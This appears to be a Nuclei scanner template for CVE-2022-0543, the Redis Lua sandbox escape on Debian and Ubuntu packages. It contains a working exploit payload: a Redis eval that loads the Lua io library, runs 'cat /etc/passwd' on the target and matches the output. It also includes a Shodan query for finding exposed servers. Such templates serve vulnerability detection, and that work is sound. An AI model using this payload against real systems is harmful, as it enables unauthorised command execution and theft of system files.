id: CVE-2022-0543 info: name: Redis Sandbox Escape RCE author: dwisiswant0 severity: critical reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis description: | This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. Taken from rapid7/metasploit-framework#16504. metadata: shodan-query: "redis_version" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.00 cve-id: CVE-2022-0543 tags: cve,cve2022,network,redis,unauth,rce network: - inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" host: - "{{Hostname}}" - "{{Host}}:6379" read-size: 64 matchers: - type: regex regex: - "root:.*:0:0:"